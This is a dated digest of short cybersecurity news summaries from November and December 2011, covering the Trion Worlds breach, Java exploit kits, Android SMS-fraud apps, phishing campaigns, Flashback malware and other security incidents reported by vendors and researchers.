Rift developer Trion Worlds hacked. Trion Worlds, the developer behind the massive multiplayer online game Rift, had its servers hacked, losing information that includes user names, passwords, e-mail addresses, billing addresses, and credit card information. The announcement was made on the official Trion Web site and through an e-mail sent to subscribers and anyone who previously held an account with the firm. It describes that almost every piece of stored information about the company’s users was taken, including: “user names, encrypted passwords, dates of birth, email addresses, billing addresses, and the first and last four digits and expiration dates of customer credit cards.” Trion was quick to point out “There is no evidence, and we have no reason to believe, that full credit card information was accessed or compromised in any way.” The e-mail describes the hack as “recent” but not providing a time frame of when it might have occurred or how long Trion has known about it.

Holiday season is fertile ground for most malware infections. Data released by SpywareRemove.com shows the holiday season, beginning with the Thanksgiving holiday in the United States through Christmas, is the most active time for malware infections. Research data compiled by the site over the last year (late 2010 — present) showed December 27, 2010 to have the largest spike in malware infections it tracked, with a 56 percent increase over the previous day. The company believes the December 27 date was prolific among cybercriminals due to the after Christmas rush of gift exchange and post-holiday deals by retailers. The Web site compiled its list of the top five malware infection dates according to its tracking data: December 27, 2010; February 27, 2011 (malware and phishing attacks attributed to the New Zealand earthquake); March 28, 2011 (breaking news of the Arab Spring protests); April 4, 2011 (the Monday after April Fool’s day); and November 28, 2011 (Cyber Monday). The top five malware infection dates indicate malware writers use a two-pronged strategy to deliver their malicious payloads to computers by taking advantage of one-time major events, as well as fixed dates on the calendar during the holiday season.

12/23/2011

Facebook scams now spread by dodgy browser plug-ins. Con men developed a new approach towards spreading scams on Facebook. Instead of using status updates as a lure, the latest generation of Facebook scams attempt to trick marks into installing malicious browser extensions. The plug-ins are supposedly needed to view non-existent video clips supposedly posted by an earlier victim. Once installed, these malign browser ad-ons spread the scam from one user’s profile to another.

Security experts advise users to ditch Java. After installing operating systems on their computing machines, most individuals rush to install applications that help them browse the Web. While many believe that without components such as Flash and Java they will be unable to access certain content, there are always safer, more secure, alternatives. F-Secure researchers reported many people use Java, but in reality they do not need it, its presence only giving cybercriminals the opportunity to exploit the device it is installed on. The main issue is many Internet users confuse Java with JavaScript, a crucial component for the Web. “If you’re running Java, but not the latest version, you’re vulnerable. So either you have to check at all times that you have the latest version of Java — or get rid of it altogether,” said a F-Secure researcher. After studying the Blackhole exploit kit’s control panel, the experts discovered more than 16,000 computers were taken over using the Java Rhino vulnerability

12/21/2011

Mobiles forced to send premium-rate texts in new attack. Cyber criminals may be able to force mobile phones to send premium-rate SMS messages or prevent them from receiving messages due to security weaknesses in mobile telecoms standards. The weakness involves the handling of messages directed towards SIM Application Toolkits — applications preloaded onto SIM cards by mobile operators. The applications can be used for functions such as displaying available credit or checking voice mail, as well as handling value-added services, such as micro-payments. SIM Toolkits receive commands via specially formatted and digitally signed SMS messages. These messages are processed without appearing in a user’s inbox and without triggering any other alert. The encryption scheme is robust, but problems might arise because error messages are automatically sent out if a command cannot be executed. The SIM Toolkit service message can be configured so responses are made via SMS to a sender’s number or to the operator’s message center, creating two possible attack scenarios.

Malware authors rush to release Java exploit packs. Researchers at M86 are warning that exploits for a recently-discovered Java vulnerability are available in the wild, meaning cyber criminals could target unpatched systems. The security firm also warned this news shows authors are getting much faster at updating exploit kits when new vulnerabilities are discovered. While it used to take authors a month or more, some authors are now updating their kits even before a patch is released. Although a patch was released to fix the Java vulnerability, any unpatched systems are still at risk, M86 warns. The Blackhole, Phoenix, and Metasploit export kits are the ones that rush-released new versions to exploit the vulnerability, called CVE-2011-3544, which exploits the Rhino Javascript engine. An attacker can use the script to generate an error object, which can then give them full privileges. The attacker can then execute code will full permissions, M86 said.

Flash Player scam charges victims for free program via SMS. A scheme that charges people via SMS for what should be a free copy of Adobe Systems’ Flash player is apparently undergoing a test run on a Russian social network, according to security vendor Bitdefender. The scam was uncovered after a Bitdefender customer found a suspicious link to a Flash Player update on Vkontakte, a social networking service for Russian speakers, according to a senior e-threat researcher for Bitdefender. If clicked, the link leads to the Flash Player application, but a drop-down menu then asks what country the user is located in as well as their mobile phone number and operator. Adobe does not ask for any of that information during a normal installation. If the person is located outside of Russia, the installer instructs the person to send a message to a short code to receive an “activation” code for the program, the researcher said. Russian users are not charged, perhaps because the scam would be reported quickly to authorities, he said. The scammers have apparently signed up for SMS payment processing services for countries such as the United Kingdom. According to the drop-down menus, the scammers arranged for SMS payments on networks including O2, Vodafone, and Orange, as well as AT&T in the United States. The scam is not widespread yet, which the researcher said may mean the scammers are conducting a trial run to see how well it works before hitting other social networking sites such as Facebook.

12/19/2011

Old smartphones leave tons of data for digital dumpster divers. A recent exploration made by a digital forensics company into a handful of phones found in the smartphone secondary market showed how easy it is to glean information from old or lost phones, even if a factory reset has been committed. An expert from Access Data gave Dark Reading information on his findings from his informal research and explained some of the repercussions for corporations and consumers who do not pick, manage, or dispose of their phones wisely. The director of mobile forensics for AccessData said, "I'd guess if you went and grabbed 10 phones [from recycling companies], 60 percent are going to contain data." He said at the behest of a customer interested in the data lingering on phones sold by used phone resellers and consumers using Craigslist and eBay, he used AccessData's tools to do an in-depth forensics dive into five handsets acquired from this market. The phones were the iPhone 3G, Sanyo 2300, HTC Wildfire, LG Optimus, and HTC Hero. Of those five, the iPhone and the old Sanyo had not been reset and contained what the director called logical data — active account sign-ons, contacts, and calendar information easily usable by any person who turns on the phone. Even though all of the Android phones had been wiped through a factory reset, four of the five phones also included data that would take someone with forensics tools and knowledge to extract from more hidden storage locations. Some of the details available within those phones included user account information, Social Security numbers, geo-location tags, deleted text messages, and a resume.

12/16/2011

Hackers feast on unencrypted credit card data stored by merchants. A report released by Security Metrics December 15 states the number of merchants that store customer credit card data in an unencrypted form is higher than ever. The latest Merchant Data Security Report reveals that 71 percent of the businesses that participated in the study stored unencrypted credit card data, and many were highly vulnerable to SQL injection attacks. With the use of a tool called PANscan, Security Metrics scanned the systems of 2,736 merchants, including hard drives, networks, and attached storage devices in search of unencrypted primary account numbers (PAN) and magnetic stripe track data. The scan found a total of 378,748,700 cards, which translates into an 8 percent increase when compared to 2010. Old, non-PCI compliant, payment applications are problematic and easy to hack, but new payment systems can turn out to be just as insecure if they are not configured correctly. Other problems emerge from the improper removal of payment-information-containing files. Many believe if they delete a file, it is as good as gone, but this is not the case. Even if the information is not available for the user, hackers can easily recover it from the device’s unassigned storage space. While a large part of the sensitive data is stored unknowingly by employees who are just not trained to handle sensitive data, in many situations merchants do not bother to make sure the data is safely tucked away from malicious cybercriminal operations.

Silent updating for Internet Explorer. Microsoft announced that in 2012 Internet Explorer will be updated “silently” to its newest possible version. This new silent update will eliminate the pop-up window that currently allows users to opt-out or postpone the update. Silent updating is generally seen as a big improvement to security on the Internet. Being on the newest possible Internet Explorer brings a significant increase in security and robustness to malware infections due to better architecture, sandboxing, and the included URL filtering feature.

GlobalSign certificate authority details ComodoHacker security incident. After temporarily shutting down their certificate issuance services in September, GlobalSign released a report with conclusions on the events that took place after they learned ComodoHacker breached their systems. The company stated no rogue certificates were issued and no customer data was exposed. The evidence indicates no root certificate keys and associated Hardware Security Modules (HSM), Issuing Authorities and associated HSMs, or Registration Authority services were compromised. The certificate authority’s infrastructure was left undamaged by the cybercriminal operation. The company reports only a peripheral Web server on which the public Web site was hosted was compromised, but the server was not part of the certificate issuance infrastructure. GlobalSign claimed only HTML pages, publicly available PDF documents, and the key and certificates assigned to globalsign.com were exposed to the hacker, but both the key and the certificate were revoked. Customers were impacted only between September 6 and 15 when the issuance was temporarily halted. During that period, third party security solutions providers such as Fox-IT and Cyber Security Japan were contacted for the purpose of analyzing and reinforcing the breached infrastructure. GlobalSign continues to collaborate with authorities while they gather more evidence on ComodoHacker, and the other actors involved.

Newfangled graphics engine for browsers fosters data theft. Software developers at Google, Apple, Adobe, and elsewhere are grappling with the security risks posed by an emerging graphics technology, which in its current form could expose millions of Web users’ sensitive data to attackers. The technology, known as CSS shaders, is designed to render a variety of distortion effects, such as wobbles, curling, and folding. It works by providing programming interfaces Web developers can call to invoke powerful functions from an end user’s graphics card. However, it could also be exploited by malicious Web site operators to steal Web-browsing history, Facebook identities, and other private information from unsuspecting users, a security researcher on Google’s Chrome browser warned recently.

Use of the Black Hole exploit kit and Java exploits is growing. Security experts are increasingly concerned about the growth of Java as the application of choice for criminals. Java either is or will imminently become the favorite application attack vector, surpassing even PDF and SWF files. A security expert with Kaspersky Lab wrote that a Java exploit first published in October and used in drive-by attacks has found its way into the Black Hole exploit kit, aimed primarily at users in Russia, the United States, the United Kingdom, and Germany. “Java is probably the vector most commonly exploited by cybercriminals,” said a SophosLabs security expert, “and we don’t see any sign of this situation changing anytime soon. The Black Hole exploit pack is the most commonly used malicious software installer that SophosLabs have been seeing in the last three months.” According to Oracle, there are more than 13 million devices running Java. Criminals are turning to Java because they are businessmen — they tend to perform cost-benefit analyses. The problem with Java, said an ESET senior research fellow, comes “from the fragmentation of its implementations across platforms and devices. He noted he is unsure “how far it’s possible to fix it across the board.”

Google pulls more SMS fraud-related Android apps. Google removed five additional apps from the Android Market that mobile-security firm Lookout alleges appear to be engaged in SMS fraud targeting Europeans. The apps were removed after Lookout discovered them December 13, a Lookout representative told CNET. That brings the total number of apps removed that Lookout has dubbed “RuFraud” (Russian Fraud) to 27, the representative said. The apps, which appear to be free versions of legitimate games or wallpaper, are designed to charge premium SMS toll rates on European phones, Lookout said. The rates are buried within the terms of service, and users may not realize they will be charged $5 per SMS, according to the firm. Google confirmed December 12 it removed 22 Lookout-identified fraudulent apps before the firm found the 5 additional ones.

12/14/2011

Windows Phone bug reportedly disables messaging. A reported vulnerability in Windows Phone causes its messaging features to be disabled after the device is sent a specific SMS or chat message. The bug was reported to the blog Winrumors, according to the researcher who administers the Web site. He wrote he and the reporters were notifying Microsoft. In a video, the Winrumors administrator shows that after a Windows Phone device receives the message, it shuts down. Upon reboot, the messaging hub tile does not work despite repeated attempts. The denial-of-service issue also occurs if a person is sent a specific Facebook or Windows Live Messenger chat message. Winrumors ran tests on the HTC Titan, the Samsung Focus Flash, and others running the 7740 version of Windows Phone 7.5 and the Mango RTM build 7720, the administrator wrote. "At this stage, there doesn't appear to be a workaround to fix the messaging hub apart from hard resetting and wiping the device," he wrote. The bug appears to have other strange effects. He found a live tile featuring updates from a Facebook friend will lock up if that friend posts a particular message. He wrote that problem could be avoided by initially booting up a device, getting past the lock screen quickly, and then removing the live tile before it flips over and locks the device.

Google Wallet stores too much unencrypted data, researchers say. A recent forensic analysis performed by researchers from ViaForensics showed while Google’s Wallet application can be highly useful for smartphone owners, doing a good job protecting their assets, there are some issues that may be security risks. During the experiment, performed on a rooted device, three methods of breaking the Wallet’s security were attempted: mad-in-the-middle (MitM) attacks, forensic analysis on the data stored on a device, and examination of system logs. The first conclusions were that MitM attacks are no match for the application since during account setup and during credit card add, the attempts of the experts failed. In the second phase, the forensic analysis, the app’s cache directory revealed pictures of some credit cards, the most significant information that could be seen being the card’s expiration date. However, before the research was finished, Google issued an update that resolved this issue. The SQL databases revealed the most information on the device’s owner, including credit card balance, limits, expiration date, cardholder name, transaction dates, and locations. All the data was left unencrypted. Another security bug patched by Google is the delete transaction or reset function did not actually delete the data, the researchers proving it could be easily recovered.

Google pulls 22 more malicious Android apps from Market. Google removed nearly two dozen malware-infected apps from its official Android Market in the last several days, a security company said December 11. So far in 2011, Google pulled more than 100 malicious Android apps from its download distribution channel. Lookout Security said it and other vendors notified Google of several recent waves of malicious apps — 22 apps altogether — that reached the Android Market. Google removed those programs from the e-mart, said Lookout. Lookout spotted nine malware-infected apps the week of December 5, and another 13 the weekend of December 10 and 11. The company dubbed the malware bundled with the fake apps "RuFraud", and said the code sent spurious text messages to premium numbers, racking up revenues for the criminals. While North American users were not affected — RuFraud was written not to target the United States, for instance — people in France, Germany, Italy, Poland, Russia, the United Kingdom, and several other eastern European and central Asian countries were. As in previous malicious app campaigns, the RuFraud apps borrowed elements of legitimate apps, but did not simply snatch complete apps, then re-package them with malicious code, said Lookout. The recent RuFraud operations began with horoscope apps, then moved on to Android phone wallpapers and downloaders posing as accessories to bestselling games such as "Angry Birds", and "Cut the Rope", then finished with a round of fake games, Lookout's researchers said. That last run accounted for the majority of downloads before Google pulled the apps. Lookout estimated about 14,000 copies of the fake games were grabbed by users.

Spam campaign bypasses Gmail filters employs Google Docs. Every so often, online crooks and spammers use Google Docs to host phishing forms or documents with embedded malicious links. One such spam campaign is currently delivering a simplistic e-mail with a link to a Google Docs to inboxes around the world. A Stanford researcher identified the campaign and found the e-mail effectively bypassed Google's spam filters — a rare occurrence. The link leads an untitled document touting fake/novelty university diplomas and degrees. Google Docs displays the number of people who viewed the document, so the researcher could see how many people were viewing it — which means they followed the link. "I saw 7 other people taking a look at the document while writing this post so it is clear that this campaign is active and successful," he commented.

DNS hijacks now being used to serve Black Hole Exploit Kit. Attackers have been going after various pieces of the DNS infrastructure for a while, and it is not unusual for there to be organized campaigns that target certain industries or geographic regions. Lately, however, researchers are seeing a pattern where attackers add new names to existing domains and use those sub-domains to piggyback on the good reputation of sites and push counterfeit goods, pills, etc. Now, attackers are using the attack to push exploits via the Black Hole Exploit Kit. The attacks have been ongoing for a few months, and, while they are simple in theory, researchers are unable to figure out how the attackers managed to compromise the domains and get access to the DNS records to add their own sub-domains. Attackers have been able to alter domain records of dozens of existing, legitimate sites, including local government agencies, small businesses, community banks, and others and then inserted new sub-domain names into the records. Researchers at the SANS Internet Storm Center have been looking into the attacks and identified dozens of domains affected and poisoned with the insertion of myriad sketchy sub-domains pushing fake pharmaceuticals, loans, and other Internet spam staples.

12/13/2011

Phishing targets FDIC. The Federal Deposit Insurance Corporation (FDIC) is warning banks about another strand of phishing attacks feigning to come from the FDIC, Bank Info Security reported December 9. In an e-mail alert, the FDIC warned that the e-mails appear to be coming from “insurance@fdic.gov,”, subscriptions@fdic.gov”, “alert@fdic.gov”, and “accounts@fdic.gov.” The fraudulent e-mails include the subject lines “FDIC: Your business account”, “FDIC: About your business account”, “Insurance coverage of your business account”, or other similar variations. The e-mails also include a malicious link that claims to offer critical information about financial institutions. The claim states: “We have important news regarding your bank. This includes information on the acquiring bank (if applicable), how your accounts and loans are affected, and how vendors can file claims against the receivership.” The FDIC said recipients of the e-mails should be mindful of any electronic correspondence that appears to come from the FDIC, and reiterated that it does not issue unsolicited e-mails to consumers or business accountholders.

Web scam-busting trio thwarted by mystery DDoS rocket. Several anti-scam sites were knocked offline the week of December 5 by fierce and well-organized distributed denial of service (DDoS) attacks. The sites — 419eater.com, scamwarners.com, and aa419.org (Artists against 419) — were swamped with junk traffic for several days. During the attack, the sites’ administrators turned to blogs, Facebook, and other alternative channels to distribute news of newly detected fake payment sites and other urgent anti-fraud information. “These websites and their users provide excellent exposure for online fraud activities and have been responsible for allowing thousands of prospective victims to detect a scam in play, and get out before losses are incurred,” a reader who informed The Register about the attacks explained. “They also work actively to kill fake bank sites, fake freight forwarding sites and other criminal resources.” Both 419eater.com and scamwarners.com were back operating normally by December 12, while aa419.org remained sluggish.

12/12/2011

Microsoft plans 20 patches next week will fix Duqu and BEAST bugs. Microsoft announced December 8 it will issue 14 security bulletins the week of December 12 to patch 20 vulnerabilities in Windows, Internet Explorer (IE), Office, and Windows Media Player. Among the patches will be ones that plug the hole used by the Duqu intelligence-gathering Trojan, and fix the secure socket layer 3.0 and transport layer security 1.0 bug popularized 3 months ago by the Browser Exploit against SSL/TLS hacking tool. Three of the 14 updates were tagged with Microsoft’s “critical” label, while the remaining 11 were marked “important.” Bugs in 10 of the updates could be exploited by attackers to remotely plant attack code on unpatched PCs, Microsoft said in its monthly advance notification that precedes each Patch Tuesday. A number of those bulletins were pegged as important, a move Microsoft makes when the bugs cannot easily be exploited because the pertinent components are not switched on by default, or because defensive technologies like ASLR and DEP help protect users.

12/09/2011

Beware Adobe software upgrade notification – malware attached! Cybercriminals have widely spammed out a malware attack posing as upgrades for Adobe Acrobat Reader and Adobe X Suite Advanced. The e-mails, which pretend to come from Adobe, have a ZIP file attached that contains a version of the Zeus Trojan, designed to steal banking information from compromised computers. The risk is that less technical-savvy computer users might believe the e-mail is legitimate, and be tricked into installing malware onto their computer thinking it is an official Adobe update. Each e-mail is slightly different, incorporating different reference numbers in the subject line, attached filename, and message body. The samples seen so far by Sophos all carry malware in the file "Adobe Systems Software Critical Update Dec 2011.exe" contained within the ZIP.

12/08/2011

Fake Verizon notification carries malware. A spam e-mail campaign aiming to infect users with a banking trojan is currently underway and is targeting mobile carrier customers, Microsoft has warned, Help Net Security reported December 7. The e-mail purports to be coming from Verizon, and tries to make the recipient feel a sense of urgency by claiming it contains important account information from Verizon Wireless. The message starts with the unusual greeting of "Hello Dear!," and proceeds to try and convince the users they have to pay a rather large bill (the amount varies from $250 to over $1,500). "View all your recent bills in application materials," says the e-mail, and offers an attached ZIP file named Verizon-Wireless-Account-StatusNotification_#######.zip, with random numbers used in the name. The archive contains a similarly named executable, which is detected as a variant of the Zeus banking Trojan, and Microsoft warns a similar campaign carrying the same payload has already been started using e-mails pretending to deliver a critical update for Adobe Acrobat Reader and Adobe X Suite.

Hackers exploit Adobe Reader zero-day, may be targeting defense contractors. Adobe confirmed December 6 an unpatched vulnerability in Adobe Reader is being exploited by criminals. Those attacks may have been aimed at defense contractors. Adobe promised to patch the bug in the Windows edition of Reader and Acrobat 9 no later than the end of the week of December 12. "A critical vulnerability has been [found] in Adobe Reader X (10.1.1) and earlier versions for Windows and Macintosh, Adobe Reader 9.4.6 and earlier 9.x versions for Unix, and Adobe Acrobat X (10.1.1) and earlier versions for Windows and Macintosh," Adobe said in an early-warning e-mail. "This vulnerability could cause a crash and potentially allow an attacker to take control of the affected system." The company issued a security advisory with what information it was willing to share. Adobe acknowledged the vulnerability is being exploited in what it called "limited, targeted attacks" against Reader 9.x on Windows, but did not provide any additional information about where and when the attacks were occurring, or who had been targeted. Adobe identified the bug as”U3D memory corruption vulnerability." U3D (universal 3D) is a compressed file format standard for 3-D graphics data promoted by a group of companies, including Adobe, Intel, and Hewlett-Packard. Reader vulnerabilities are typically exploited by attackers using malicious PDF documents thatare attached to e-mail messages with baited subjected heads that try to dupe recipients into opening the document. Doing that also executes the malicious code — in this case,likely malformed U3D data — hidden in the PDF, compromising the victim's PC and letting the attacker infect the machine with other malware. The attacks exploiting the unfixed flaw may have targeted U.S. defense contractors: Adobe originally credited the security response teams at both Lockheed Martin and MITRE with reporting the vulnerability.

12/07/2011

HP publishes list of LaserJet printers susceptible to malicious firmware update. After the controversial study about HP LaserJet printers that could be set on fire was released to the public, HP quickly came forward to defend its reputation, Softpedia reported December 6. The first move they made was to publish November 30 the list of devices that could be impacted by the installation of an unauthorized printer firmware. “Potential security vulnerability has been identified with certain HP printers and HP digital senders. The vulnerability could be exploited remotely to install unauthorized printer firmware,” reads the security bulletin. HP LaserJet Enterprise 500 color M551, HP LaserJet Enterprise 600 M602, HP LaserJet M3035, HP Color LaserJet CP4005, HP LaserJet P4515, and HP LaserJet Enterprise M4555 MFP are just a few of the models out of the 40 or so listed by the company. Essentially, customers who purchased HP LaserJet models that were manufactured before 2009 may be susceptible to the attack. Meanwhile, until they come up with a more permanent solution to the issue, an advisory was published so customers can learn how to secure their devices against unauthorized access.

12/06/2011

U.S. financial fraud increasing rapidly. Cyber criminals are launching more and more sophisticated attacks on U.S. wireless consumers, Help Net Security reported December 5. Research showed financial fraud and spam via SMS texts is growing at a rate of over 300 percent year over year. Cloudmark is tracking over 20 unique, financial related SMS attacks in the United States with thousands of variants on each attack. The attack techniques are becoming increasingly sophisticated and can include any combination of rapidly changing content, phone numbers, and MSISDN (a number uniquely identifying a mobile subscription). There are a number of recent SMS attacks. Two prominent examples include loan and gift card scams, and the more malicious credit card and bank fraud attacks. For the loan and gift card attacks, the scammers’ business model is based on referrals for loans, via either Web redirects that send traffic immediately to an affiliate program, or by accepting applications forwarded to affiliate programs. For the banking and credit card fraud attacks, the text in each fraudulent SMS appears as if it is coming from a major bank or credit card company such as Wells Fargo or Visa. The attackers are sending texts with messages such as "Your Visa card has been deactivated. Please call [number] to reactivate it." When a recipient calls the number, they are asked for their name, bank card number, account number, expiration date, security/pin code and/or address –- all the data the criminals need to gain access to the credit card or bank account. In some cases, criminals created a replica of a victim’s bank card from the data provided. Cyber criminals are increasingly moving from targeted phishing via e-mail to mobile messaging.

Cyber criminals launch bogus money transfer malware attacks. A new malware attack is luring victims by using Web-based exploits to perform a "drive-by" malware download under the guise of an electronic money transfer, V3.co.uk reported December 3. Researchers at Solera Networks reported the attackers make use of Google's goo.gl link-shortening service to hide the location of the attack site. The attacks claim to originate from the "Electronic Payments Association" and notify potential victims of a failed direct deposit attempt. Clicking on the link included with the message redirects to a site that attempts to perform a number of exploits using vulnerabilities in Flash and Java. The director of threat research at Solera told V3 the attacks are part of a much larger trend in which cyber criminals target browser plug-ins and third-party components. The attacks also highlight the use of third-party link-shortening services. Other malware and spam operations have made similar use of such tools to insulate targets from the actual attack site.

‘Verified by Visa’ presents major security flaw. Trend Micro researchers discovered the technology behind the Verified by Visa trademark is much more unsecure than anyone would believe, and a coding error is not to blame; instead it is a design flaw that could be taken advantage of by criminals, Softpedia reported December 2. The 3 Domain Secure (3DS) security protocol introduced by Visa in 2001 was developed to prevent credit card fraud but, in practice it is inefficient. When users make an online transaction protected by Visa, they are redirected to a verification page that requires confirmation of some details and a password. Since the merchant does not come in contact with users' details at any point, the transaction should be secure. A problem emerges due to the password reset feature. When a customer accesses the reset password function, she is presented with a form that requires some details of the cardholder to prevent fraud, but the problem is all the data can be found on the physical credit card. Signature panel code, expiration date, cardholder name, and birth date is requested from the customer to complete the reset process. All the details except for the birth date are printed on the card, but also, these are the details first obtained by any cybercriminal in operations that target credit cards. Researchers propose this verification method should be at least updated to encapsulate a secret question, a one-time password reset URL should be sent to the user’s e-mail, and the entire procedure should result in a notification. The 3DS security protocol is not only used by Visa. Web sites that display MasterCard Secure Code, J/Secure (JCB International), and SafeKey (American Express) implement the same technology.

12/05/2011

SEC charges multiple hedge fund managers with fraud in inquiry targeting suspicious investment returns. As part of an initiative to combat hedge fund fraud by identifying abnormal investment performance, the Securities and Exchange Commission (SEC) December 1 announced enforcement actions against three separate advisory firms and six individuals for various misconduct, including improper use of fund assets, fraudulent valuations, and misrepresenting fund returns. In particular, the SEC alleges the firms and managers engaged in a wide variety of illegal practices in the management of hedge funds or private pooled investment vehicles, including fraudulent valuation of portfolio holdings, misuse of fund assets, and misrepresentations to investors about critical attributes such as performance, assets, liquidity, investment strategy, valuation procedures, and conflicts of interest. In one case, the SEC charged two individuals for engaging in a fraudulent scheme to overvalue the reported returns and net asset value of the Millennium Global Emerging Credit Fund. The complaint alleges the fund’s former portfolio manager schemed with two European-based brokers to inflate the fund’s reported monthly returns and net asset value by manipulating its supposedly independent valuation process. The scheme caused the fund to drastically overvalue security holdings by as much as $163 million in August 2008. By overstating the fund’s returns and overall net asset value, the manager was able to attract at least $410 million in new investments, deter about $230 million in eligible redemptions, and generate millions of dollars in inflated management and performance fees. The other actions were brought against ThinkStrategy Capital Management and its sole director, Solaris Management LLC and its owner, and LeadDog Capital Markets LLC and its general partners and owners.

Yahoo Messenger flaw enables spamming through other people's status messages. An unpatched Yahoo Messenger vulnerability that allows attackers to change people's status messages and possibly perform other unauthorized actions can be exploited to spam malicious links to a large number of users, IDG News Service reported December 2. The vulnerability was discovered in the wild by security researchers from antivirus vendor BitDefender while investigating a customer's report about unusual Yahoo Messenger behavior. The flaw appears to be located in the application's file transfer API (application programming interface) and allows attackers to send malformed requests that result in the execution of commands without any interaction from victims.

Trusteer warns that cybercriminals are moving into fresh one-stop crime areas. Research published November 30 by Trusteer claims to show cybercriminals have widened the services they provide as a one-stop-shop to third-party fraudsters. According to the in-browser security specialist’s chief technology officer, these one-stop shops are where criminals can buy everything they need to meet demand from fraudsters. Trusteer has come across a new fraud group that — as well as offering infection services for prices between 0.5 and 4.5 cents for each upload, depending on geography — also provides polymorphic encryption, and AV checkers. This new one-stop-shop approach for malicious services, he asserts, is a natural evolution of the market: if the customers need to infect, then they also need to evade AV. For polymorphic encryption of malware, he said, the fraudsters are charging from $25 to $50 — and for prevention of malware detection by anti-virus systems (AV checking) they charge $20 for 1 week, and $100 for 1 month of service. The chief technology officer said it is now a buyer’s market, with his firm’s research operation having also come across advertisements published by prospective buyers of infection services. The ad, he noted, basically presets the buying price, how it is charged, and the scope of the service, with the advertiser only paying for unique uploads, with the price calculations being conducted according to the advertiser's own Black Hole exploit kit stats module. In addition, Trusteer said the advertiser will pay in advance to the sellers with recommendations, that is, those that have 1-10 "fresh" forum messages, otherwise the sellers are paid afterwards.

12/01/2011

Hackers launch millions of Java exploits, says Microsoft. Hackers continue to launch attacks exploiting vulnerabilities in Oracle’s Java software in record numbers, Microsoft said November 28. Citing research from a recent report, a director in the company’s Trustworthy Computing group said up to half of all attacks detected and blocked by Microsoft’s security software over a 12-month period were Java exploits. Altogether, Microsoft stopped more than 27 million Java exploits from mid-2010 through mid-2011. Most of those exploits targeted long-ago-patched vulnerabilities, the director said. The most commonly-blocked Java attacks — over 2.5 million — in the first half of 2011 exploited a bug disclosed in March 2010 and patched by Oracle the same month. Second on the popularity chart for the 12-month stretch was an exploit of a bug patched in December 2008. Other bugs that made the actively-exploited list were quashed in November 2009 and March 2010.

Apple issues late XProtect update for Flashback Trojan. To help combat malicious software, Apple incorporated a feature into OS X called XProtect that is a rudimentary scanner for newly downloaded files that notifies users if they contain malware. But when the scanner’s definitions are updated, criminals will likely release new variants. Currently there is no new known malware for OS X, but criminals behind one of the newer attacks, called Flashback, have been creating new variants. Flashback was first found in late September packaged as an installer for the popular Flash Player plug-in. When run, the malware installed a loader into the user’s preferences folder. In its second revision (found in late October), the malware changed to inject code into Web browser applications (Safari and Firefox), which would launch the malware when these programs were run. In both cases, the malware attempts to send personal information to remote servers. Apple’s XProtect definitions were updated to tackle the first Flashback malware (OSX/Flashback.A); however, XProtect was last updated November 1 to include definitions for the DevilRobber malware. On November 29, Apple updated XProtect again to deal with Flashback — however, despite there being a number of new Flashback variants, the update only includes definitions for the second release of Flashback (OSX/Flashback.B), which was found about a month ago. Security Company Intego recently reported that the Flashback malware has undergone a number of changes that allow the code to slide past malware detection schemes, even though the behavior of the malware has not changed much.